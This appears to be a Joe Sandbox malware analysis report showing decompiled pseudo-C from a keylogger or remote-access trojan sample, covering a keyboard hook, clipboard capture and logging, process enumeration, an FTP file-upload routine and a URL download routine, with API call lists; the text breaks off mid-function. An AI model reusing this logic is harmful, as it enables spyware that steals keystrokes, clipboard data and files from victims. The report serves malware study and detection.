					_pop(_t34);
					_pop(_t30);
					_t17 = E00C83960(_t16, _t30, _t34);
					__eflags = _t17 - 1;
					if(_t17 == 1) {
						L3:
						 *_t38 = 1;
						 *_t36 = _v571;
					} else {
						_push(E00C82E48(_t29) + _t22);
						_push(CharUpperW(_t29));
						_t26 = CharUpperW( &_v543);
						_pop(_t35);
						_pop(_t31);
						_t27 = E00C83960(_t26, _t31, _t35);
						__eflags = _t27 - 1;
						if(_t27 != 1) {
							_t9 = Process32NextW(_t37,  &_v579);
							continue;
						} else {
							goto L3;
						}
					}
					break;
				}
				CloseHandle(_t37);
				return  *_t38;
			}

0x00c83a5d
0x00c83a5f
0x00c83a6a
0x00c83a6c
0x00c83a74
0x00c83a7a
0x00c83a81
0x00c83a83
0x00c83af1
0x00c83a92
0x00c83a99
0x00c83aa4
0x00c83aa9
0x00c83aaa
0x00c83aab
0x00c83ab0
0x00c83ab2
0x00c83ada
0x00c83ada
0x00c83ae2
0x00c83ab4
0x00c83abd
0x00c83ac4
0x00c83aca
0x00c83acf
0x00c83ad0
0x00c83ad1
0x00c83ad6
0x00c83ad8
0x00c83aec
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83ad8
0x00000000
0x00c83ab2
0x00c83af6
0x00c83b07

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
CharUpperW.USER32(019A0000), ref: 00C83A94

Part of subcall function 00C83988: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,019A0000,00C83AA3,00000000,00000000), ref: 00C839CA
Part of subcall function 00C83988: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,019A0000,00C83AA3,00000000,00000000), ref: 00C83A0F

CharUpperW.USER32(00000000), ref: 00C83AA4
CharUpperW.USER32(019A0000), ref: 00C83ABF
CharUpperW.USER32(?), ref: 00C83ACA
Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C86748, Relevance: 10.6, APIs: 7, Instructions: 73
windowthread

C-Code - Quality: 47%

			E00C86748(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v20;
				char _v24;
				struct HKL__* _v28;
				char _v284;
				intOrPtr _v288;
				char _v292;
				struct HHOOK__* _t21;
				int _t35;
				struct HWND__* _t36;
				long _t40;
				void* _t51;

				_push(_t51);
				_push(0xc8683a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51 + 0xfffffee0;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 == 0 && (_a8 == 0x104 || _a8 == 0x100)) {
					E00C8291C();
					GetKeyboardState( &_v284);
					_v28 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), 0));
					_v292 = _v24;
					_v288 = _v20;
					_t40 = VirtualAlloc(0, 0x10c, 0x1000, 0x40);
					E00C82914(_t40,  &_v292);
					_t35 =  *0xc8decc; // 0xc1f1
					_t36 =  *0xc8b0b4; // 0x0
					SendMessageA(_t36, _t35, 0x10c, _t40);
				}
				_pop( *[fs:0x0]);
				_push(E00C86841);
				_t21 =  *0xc8b0c4; // 0x0
				return CallNextHookEx(_t21, _a4, _a8, _a12);
			}

0x00c86756
0x00c86757
0x00c8675c
0x00c8675f
0x00c8676a
0x00c8676b
0x00c8676c
0x00c8676d
0x00c8676e
0x00c86773
0x00c8679a
0x00c867a6
0x00c867c0
0x00c867c6
0x00c867cf
0x00c867e8
0x00c867f7
0x00c86802
0x00c86808
0x00c8680e
0x00c8680e
0x00c86813
0x00c8681d
0x00c8682e
0x00c86839

APIs

GetKeyboardState.USER32(?), ref: 00C867A6
GetForegroundWindow.USER32 ref: 00C867AB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C867B3
GetKeyboardLayout.USER32(00000000), ref: 00C867BB
VirtualAlloc.KERNEL32(00000000,0000010C,00001000,00000040,00000000,00C8683A), ref: 00C867E3
SendMessageA.USER32(00000000,0000C1F1,0000010C,00000000), ref: 00C8680E
CallNextHookEx.USER32(00000000,?,?,?), ref: 00C86834

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C87918, Relevance: 10.6, APIs: 7, Instructions: 62
network

C-Code - Quality: 80%

			E00C87918(WCHAR* __eax, WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				WCHAR* _v8;
				WCHAR* _v12;
				int _t14;
				WCHAR* _t25;
				void* _t33;
				void* _t36;

				_v12 = __ecx;
				_v8 = __edx;
				_t25 = __eax;
				_t36 = InternetOpenW(0, 1, 0, 0, 0);
				_t33 = InternetConnectW(_t36, _t25, 0x15, _a8, _a4, 1, 0x8000000, 0);
				_t14 = FtpSetCurrentDirectoryW(_t33, _v8);
				asm("sbb eax, eax");
				WaitForSingleObject(_t14 + 0x00000001 & 0x0000007f, 0xffffffff);
				FtpPutFileW(_t33, _v12, _a12, 2, 0);
				asm("sbb ebx, ebx");
				InternetCloseHandle(_t36);
				InternetCloseHandle(_t33);
				return  &(_t25[0]);
			}

0x00c87921
0x00c87924
0x00c87927
0x00c87938
0x00c87954
0x00c8795b
0x00c87963
0x00c8796c
0x00c8797e
0x00c87986
0x00c8798a
0x00c87990
0x00c8799d

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C87933
InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 00C8794F
FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 00C8795B
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 00C8796C
FtpPutFileW.WININET(00000000,?,00000000,00000002,00000000), ref: 00C8797E
InternetCloseHandle.WININET(00000000), ref: 00C8798A
InternetCloseHandle.WININET(00000000), ref: 00C87990

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8406C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44

C-Code - Quality: 100%

			E00C8406C(intOrPtr* __eax) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				struct HRSRC__* _t17;
				void* _t18;
				intOrPtr* _t23;
				unsigned int _t25;

				_t23 = __eax;
				E00C81B78(__eax);
				_t4 =  *0xc8c670; // 0xc80000
				_t17 = FindResourceW(_t4, L"XTREMEBINDER", 0xa);
				_t6 =  *0xc8c670; // 0xc80000
				_t25 = SizeofResource(_t6, _t17);
				_t8 =  *0xc8c670; // 0xc80000
				_t18 = LoadResource(_t8, _t17);
				_t10 = LockResource(_t18);
				_t24 = _t10;
				if(_t10 != 0) {
					E00C81F6C(_t23, _t25 >> 1);
					E00C82914(E00C81CF4( *_t23), _t24);
					return FreeResource(_t18);
				}
				return _t10;
			}

0x00c84070
0x00c84074
0x00c84080
0x00c8408b
0x00c8408e
0x00c84099
0x00c8409c
0x00c840a7
0x00c840aa
0x00c840af
0x00c840b3
0x00c840bb
0x00c840cb
0x00000000
0x00c840d1
0x00c840da

APIs

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

FindResourceW.KERNEL32(00C80000,XTREMEBINDER,0000000A), ref: 00C84086
SizeofResource.KERNEL32(00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000,00000001,00000000), ref: 00C84094
LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000), ref: 00C840A2
LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840AA
FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840D1

Strings

XTREMEBINDER, xrefs: 00C8407B

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8389C, Relevance: 9.1, APIs: 6, Instructions: 70
clipboard

C-Code - Quality: 65%

			E00C8389C(struct HWND__* __eax, intOrPtr* __ecx, void** __edx) {
				char _v5;
				void* _v12;
				void* _t20;
				intOrPtr* _t28;
				intOrPtr _t38;
				void** _t42;
				void* _t48;
				void* _t50;
				intOrPtr _t51;

				_t48 = _t50;
				_t51 = _t50 + 0xfffffff8;
				_t28 = __ecx;
				_t42 = __edx;
				_v5 = 1;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if(OpenClipboard(__eax) == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(_t48);
					_push(0xc83949);
					_push( *[fs:eax]);
					 *[fs:eax] = _t51;
					_v12 = GetClipboardData(0xd);
					if(_v12 == 0) {
						_v5 = 0;
						_pop(_t38);
						 *[fs:eax] = _t38;
						_push(0xc83954);
						return CloseClipboard();
					} else {
						_push(_t48);
						_push(0xc8392b);
						_push( *[fs:eax]);
						 *[fs:eax] = _t51;
						_t20 = _v12;
						GlobalFix(_t20);
						 *_t42 = _t20;
						 *_t28 = GlobalSize(_v12) - 2;
						 *((intOrPtr*)(_t28 + 4)) = 0;
						 *[fs:eax] = 0;
						_push(0xc83936);
						return GlobalUnWire(_v12);
					}
				}
			}

0x00c8389d
0x00c8389f
0x00c838a5
0x00c838a7
0x00c838ab
0x00c838af
0x00c838b5
0x00c838c4
0x00c83950
0x00c8395d
0x00c838ca
0x00c838cc
0x00c838cd
0x00c838d2
0x00c838d5
0x00c838df
0x00c838e6
0x00c83932
0x00c83938
0x00c8393b
0x00c8393e
0x00c83948
0x00c838e8
0x00c838ea
0x00c838eb
0x00c838f0
0x00c838f3
0x00c838f6
0x00c838fa
0x00c838ff
0x00c8390f
0x00c83911
0x00c83919
0x00c8391c
0x00c8392a
0x00c8392a
0x00c838e6

APIs

OpenClipboard.USER32 ref: 00C838BD
GetClipboardData.USER32(0000000D), ref: 00C838DA
GlobalFix.KERNEL32(00000000), ref: 00C838FA
GlobalSize.KERNEL32(00000000), ref: 00C83905
GlobalUnWire.KERNEL32(00000000), ref: 00C83925
CloseClipboard.USER32 ref: 00C83943

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C83D8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
library

C-Code - Quality: 37%

			E00C83D8C() {
				struct HINSTANCE__* _v8;
				intOrPtr _t14;
				intOrPtr _t17;

				_v8 = LoadLibraryA("kernel32.dll");
				_push(_t17);
				_push(0xc83dd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t17;
				 *0xc8c698 = GetProcAddress(_v8, "IsWow64Process");
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(E00C83DDC);
				return FreeLibrary(_v8);
			}

0x00c83d9a
0x00c83d9f
0x00c83da0
0x00c83da5
0x00c83da8
0x00c83db9
0x00c83dc0
0x00c83dc3
0x00c83dc6
0x00c83dd4

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C83D95
GetProcAddress.KERNEL32(?,IsWow64Process,00000000,00C83DD5,?,?,?,00C83EE9), ref: 00C83DB4
FreeLibrary.KERNEL32(?,00C83DDC,00C83DD5,?,?,?,00C83EE9), ref: 00C83DCF

Strings

kernel32.dll, xrefs: 00C83D90
IsWow64Process, xrefs: 00C83DAB

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C89790, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
time

C-Code - Quality: 100%

			E00C89790(short* __eax) {
				struct _SYSTEMTIME _v20;
				short* _t17;
				struct _SYSTEMTIME* _t18;

				_t17 = __eax;
				GetLocalTime(_t18);
				GetDateFormatW(0x800, 1,  &_v20, 0, _t17, 0xff);
				_t17[E00C82E48(_t17)] = 0x20;
				return GetTimeFormatW(0x800, 8,  &_v20, 0,  &(_t17[E00C82E48(_t17)]), 0xff);
			}

0x00c89794
0x00c89797
0x00c897b0
0x00c897bc
0x00c897e9

APIs

GetLocalTime.KERNEL32 ref: 00C89797
GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,5/3/2018 10:11:44 AM,000000FF), ref: 00C897B0
GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Strings

5/3/2018 10:11:44 AM, xrefs: 00C897A1

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C837C0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19
network

C-Code - Quality: 37%

			E00C837C0(void* __eax, WCHAR* __edx) {
				signed int _t4;
				void* _t6;
				WCHAR* _t8;

				_t8 = __edx;
				_t6 = __eax;
				_push(__eax);
				L00C837B8();
				_t4 = DeleteFileW(__edx);
				_push(0);
				_push(0);
				_push(_t8);
				_push(_t6);
				_push(0);
				L00C837B0();
				return _t4 & 0xffffff00 | _t4 == 0x00000000;
			}

0x00c837c2
0x00c837c4
0x00c837c6
0x00c837c7
0x00c837cd
0x00c837d2
0x00c837d4
0x00c837d6
0x00c837d7
0x00c837d8
0x00c837da
0x00c837e6

APIs

DeleteUrlCacheEntryW.WININET(local), ref: 00C837C7
DeleteFileW.KERNEL32(019E0000,local,00000000,00C87C00,00000000,00C87D2A,?,00000000,00000000), ref: 00C837CD
URLDownloadToFileW.URLMON(00000000,local,019E0000,00000000,00000000), ref: 00C837DA

Strings

local, xrefs: 00C837C1, 00C837C6, 00C837D7

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C86946, Relevance: 6.1, APIs: 4, Instructions: 55
windowfile

C-Code - Quality: 53%

			E00C86946(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v830;
				char _v1352;
				void* _t149;
				void* _t151;
				CHAR* _t153;
				intOrPtr _t156;
				struct HHOOK__* _t159;
				void* _t165;
				void* _t173;
				void* _t174;
				void* _t180;
				void* _t181;
				void* _t190;
				void* _t191;
				void* _t194;
				void* _t200;
				void* _t209;
				void* _t210;
				void* _t219;
				void* _t220;
				void* _t226;
				void* _t235;
				void* _t236;
				int _t241;
				void* _t242;
				intOrPtr _t257;
				int _t260;
				void* _t270;
				void* _t271;
				int _t286;
				int _t287;
				struct HWND__* _t288;
				void* _t297;
				void* _t298;
				void* _t304;
				void* _t313;
				void* _t314;
				void* _t320;
				void* _t321;
				int _t328;
				void* _t330;
				void* _t331;
				void* _t340;
				void* _t341;
				void* _t348;
				void* _t349;
				void* _t358;
				void* _t359;
				void* _t368;
				void* _t369;
				void* _t375;
				void* _t376;
				void* _t385;
				void* _t386;
				int _t401;
				int _t402;
				struct HWND__* _t403;
				int _t415;
				int _t416;
				struct HWND__* _t417;
				int _t432;
				int _t433;
				struct HWND__* _t434;
				int _t449;
				int _t450;
				struct HWND__* _t451;
				void* _t460;
				void* _t461;
				int _t476;
				int _t477;
				struct HWND__* _t478;
				struct HHOOK__* _t485;
				int _t488;
				void* _t492;
				signed int _t493;
				long _t494;
				long _t496;
				long _t497;
				long _t498;
				long _t499;
				long _t500;
				void* _t504;
				void* _t507;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				void* _t517;
				void* _t519;
				void* _t520;
				void* _t521;
				void* _t524;
				void* _t525;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t531;
				void* _t537;
				intOrPtr _t539;
				long _t594;
				void* _t597;
				void* _t599;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v24 = 0;
				_v40 = 0;
				_t594 = _a16;
				_t592 = _a12;
				_t488 = _a8;
				_push(_t597);
				_push(0xc8727a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t597 + 0xfffffabc;
				_v8 = DefWindowProcA(_a4, _t488, _a12, _t594);
				_t599 = _t488 -  *0xc8ded4; // 0xc1f3
				if(_t599 != 0) {
					__eflags = _t488 -  *0xc8decc; // 0xc1f1
					if(__eflags != 0) {
						__eflags = _t488 - 0x308;
						if(_t488 != 0x308) {
							__eflags = _t488 -  *0xc8ded0; // 0xc1f2
							if(__eflags != 0) {
								__eflags = _t488 -  *0xc8ded8; // 0xc1f4
								if(__eflags != 0) {
									__eflags = _t488 -  *0xc8dedc; // 0xc1f5
									if(__eflags == 0) {
										__eflags =  *0xc8dee8;
										if( *0xc8dee8 != 0) {
											_t149 =  *0xc8dee8; // 0x0
											SetFilePointer(_t149, 0, 0, 0);
											_t151 =  *0xc8dee8; // 0x0
											SetEndOfFile(_t151);
											 *0xc8b0c8 = 0;
											 *0xc8b0cc = 0;
											__eflags =  *0xc8da4b - 1;
											if( *0xc8da4b == 1) {
												_t153 =  *0xc8b0c8; // 0x0
												E00C853EC(_t153, _t488, _t594);
											}
										}
									}
								} else {
									__eflags =  *0xc8b0c4;
									if( *0xc8b0c4 == 0) {
										_v8 = 0;
									} else {
										_t156 =  *0xc8ded8; // 0xc1f4
										_v8 = _t156 + 1;
									}
								}
							} else {
								__eflags =  *0xc8b0c4;
								if( *0xc8b0c4 != 0) {
									_t159 =  *0xc8b0c4; // 0x0
									UnhookWindowsHookEx(_t159);
								}
								 *0xc8b0c4 = 0;
							}
							goto L58;
						}
						__eflags =  *0xc8b0c4;
						if( *0xc8b0c4 == 0) {
							goto L58;
						}
						__eflags =  *0xc8b0c0 - 1;
						if( *0xc8b0c0 != 1) {
							_v16 = 0xc872d4;
							E00C8291C();
							_t165 = E00C8389C(0,  &_v36,  &_v16);
							__eflags = _t165 - 1;
							if(_t165 != 1) {
								goto L58;
							}
							__eflags = _v32;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									goto L58;
								}
								L43:
								__eflags =  *0xc8dff4;
								if( *0xc8dff4 == 0) {
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t232);
									_t235 = E00C81CF4(_v40);
									_t236 =  *0xc8dee8; // 0x0
									_pop(_t513);
									E00C85084(_t236, _t513, _t235);
									_push( &_v12);
									_push(0);
									_t241 = E00C81D04(_v40) + _t240;
									__eflags = _t241;
									_t242 =  *0xc8dee8; // 0x0
									_t514 = _t241;
									E00C85084(_t242, _t514, _t235);
								}
								E00C81BD8( &_v40, L"[CLIPBOARD] ---- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t170);
								_t173 = E00C81CF4(_v40);
								_t174 =  *0xc8dee8; // 0x0
								_pop(_t504);
								E00C85084(_t174, _t504, _t173);
								E00C86890( &_v1352);
								_t180 = E00C82E48( &_v1352);
								_t181 =  *0xc8dee8; // 0x0
								E00C85084(_t181, _t180 + _t180,  &_v1352, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t187);
								_t190 = E00C81CF4(_v40);
								_t191 =  *0xc8dee8; // 0x0
								_pop(_t507);
								E00C85084(_t191, _t507, _t190);
								_t194 =  *0xc8dee8; // 0x0
								E00C85084(_t194, _v36, _v16, 0,  &_v12);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t198);
								_t200 =  *0xc8dee8; // 0x0
								_pop(_t509);
								E00C85084(_t200, _t509, _t190);
								E00C81BD8( &_v40, L"[CLIPBOARD END]");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t206);
								_t209 = E00C81CF4(_v40);
								_t210 =  *0xc8dee8; // 0x0
								_pop(_t510);
								E00C85084(_t210, _t510, _t209);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t216);
								_t219 = E00C81CF4(_v40);
								_t220 =  *0xc8dee8; // 0x0
								_pop(_t511);
								E00C85084(_t220, _t511, _t219);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t224);
								_t226 =  *0xc8dee8; // 0x0
								_pop(_t512);
								E00C85084(_t226, _t512, _t219);
								 *0xc8dff4 = 0;
								goto L58;
							}
							__eflags = _v36;
							if(_v36 <= 0) {
								goto L58;
							}
							goto L43;
						}
						 *0xc8b0c0 = 0;
						goto L58;
					} else {
						E00C8291C();
						E00C81B78( &_v20);
						E00C81B78( &_v24);
						_t492 = _t594;
						E00C82914( &_v308, _t492);
						VirtualFree(_t492, 0, 0x8000);
						E00C868EC( &_v20);
						_t257 =  *0xc8dff8; // 0x0
						E00C81DBC(_t257, _v20);
						_t493 = _t492 & 0xffffff00 | __eflags != 0x00000000;
						__eflags = _t493 - 1;
						if(_t493 == 1) {
							E00C81BB4(0xc8dff8, _v20);
						}
						_t260 = E00C851C4(_v20, _t493, _t592, _t594);
						__eflags = _t260;
						if(_t260 == 0) {
							goto L58;
						}
						E00C85568(_t493,  &_v300, _v304, _t592, _t594,  &_v24, _v44);
						__eflags =  *0xc8dee8 - 0xffffffff;
						if( *0xc8dee8 == 0xffffffff) {
							goto L58;
						}
						__eflags = _t493 - 1;
						if(_t493 != 1) {
							L28:
							__eflags =  *0xc8dff5 - 1;
							if( *0xc8dff5 == 1) {
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t294);
								_t297 = E00C81CF4(_v40);
								_t298 =  *0xc8dee8; // 0x0
								_pop(_t519);
								E00C85084(_t298, _t519, _t297);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t302);
								_t304 =  *0xc8dee8; // 0x0
								_pop(_t520);
								E00C85084(_t304, _t520, _t297);
								E00C81BD8( &_v40, L" --- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t310);
								_t313 = E00C81CF4(_v40);
								_t314 =  *0xc8dee8; // 0x0
								_pop(_t521);
								E00C85084(_t314, _t521, _t313);
								E00C86890( &_v830);
								_t320 = E00C82E48( &_v830);
								_t321 =  *0xc8dee8; // 0x0
								E00C85084(_t321, _t320 + _t320,  &_v830, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_t328 = E00C81D04(_v40) + _t327;
								__eflags = _t328;
								_t330 = E00C81CF4(_v40);
								_t331 =  *0xc8dee8; // 0x0
								_t524 = _t328;
								E00C85084(_t331, _t524, _t330);
							}
							_push( &_v12);
							_push(0);
							_push(E00C81D04(_v24) + _t267);
							_t270 = E00C81CF4(_v24);
							_t271 =  *0xc8dee8; // 0x0
							_pop(_t517);
							E00C85084(_t271, _t517, _t270);
							__eflags =  *0xc8b0b8;
							if( *0xc8b0b8 != 0) {
								__eflags =  *0xc8b0bc - 1;
								if( *0xc8b0bc == 1) {
									_t494 = VirtualAlloc(0, E00C81D04(_v24) + _t274, 0x1000, 0x40);
									_push(E00C81D04(_v24) + _t278);
									E00C82914(_t494, E00C81CF4(_v24));
									_t286 = E00C81D04(_v24) + _t285;
									__eflags = _t286;
									_t287 =  *0xc8dee0; // 0xc1f6
									_t288 =  *0xc8b0b8; // 0x0
									PostMessageA(_t288, _t287, _t286, _t494);
								}
							}
							 *0xc8dff5 = 0;
							 *0xc8dff4 = 0;
							goto L58;
						}
						__eflags =  *0xc8dff4;
						if( *0xc8dff4 == 0) {
							E00C81BD8( &_v40, L"\r\n\r\n");
							_push( &_v12);
							_push(0);
							_push(E00C81D04(_v40) + _t457);
							_t460 = E00C81CF4(_v40);
							_t461 =  *0xc8dee8; // 0x0
							_pop(_t537);
							E00C85084(_t461, _t537, _t460);
							__eflags =  *0xc8b0b8;
							if( *0xc8b0b8 != 0) {
								__eflags =  *0xc8b0bc - 1;
								if( *0xc8b0bc == 1) {
									_t500 = VirtualAlloc(0, E00C81D04(_v40) + _t464, 0x1000, 0x40);
									_push(E00C81D04(_v40) + _t468);
									E00C82914(_t500, E00C81CF4(_v40));
									_t476 = E00C81D04(_v40) + _t475;
									__eflags = _t476;
									_t477 =  *0xc8dee0; // 0xc1f6
									_t478 =  *0xc8b0b8; // 0x0
									PostMessageA(_t478, _t477, _t476, _t500);
								}
							}
						}
						E00C81BD8( &_v40, 0xc872a4);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t337);
						_t340 = E00C81CF4(_v40);
						_t341 =  *0xc8dee8; // 0x0
						_pop(_t525);
						E00C85084(_t341, _t525, _t340);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v20) + _t345);
						_t348 = E00C81CF4(_v20);
						_t349 =  *0xc8dee8; // 0x0
						_pop(_t526);
						E00C85084(_t349, _t526, _t348);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t499 = VirtualAlloc(0, E00C81D04(_v20) + _t437, 0x1000, 0x40);
								_push(E00C81D04(_v20) + _t441);
								E00C82914(_t499, E00C81CF4(_v20));
								_t449 = E00C81D04(_v20) + _t448;
								__eflags = _t449;
								_t450 =  *0xc8dee0; // 0xc1f6
								_t451 =  *0xc8b0b8; // 0x0
								PostMessageA(_t451, _t450, _t449, _t499);
							}
						}
						E00C81BD8( &_v40, 0xc872b0);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t355);
						_t358 = E00C81CF4(_v40);
						_t359 =  *0xc8dee8; // 0x0
						_pop(_t527);
						E00C85084(_t359, _t527, _t358);
						E00C81BD8( &_v40, L" --- ");
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t365);
						_t368 = E00C81CF4(_v40);
						_t369 =  *0xc8dee8; // 0x0
						_pop(_t528);
						E00C85084(_t369, _t528, _t368);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t498 = VirtualAlloc(0, E00C81D04(_v40) + _t420, 0x1000, 0x40);
								_push(E00C81D04(_v40) + _t424);
								E00C82914(_t498, E00C81CF4(_v40));
								_t432 = E00C81D04(_v40) + _t431;
								__eflags = _t432;
								_t433 =  *0xc8dee0; // 0xc1f6
								_t434 =  *0xc8b0b8; // 0x0
								PostMessageA(_t434, _t433, _t432, _t498);
							}
						}
						E00C86890( &_v830);
						_t375 = E00C82E48( &_v830);
						_t376 =  *0xc8dee8; // 0x0
						E00C85084(_t376, _t375 + _t375,  &_v830, 0,  &_v12);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t497 = VirtualAlloc(0, E00C82E48( &_v830) + _t406, 0x1000, 0x40);
								E00C82E48( &_v830);
								E00C82914(_t497,  &_v830);
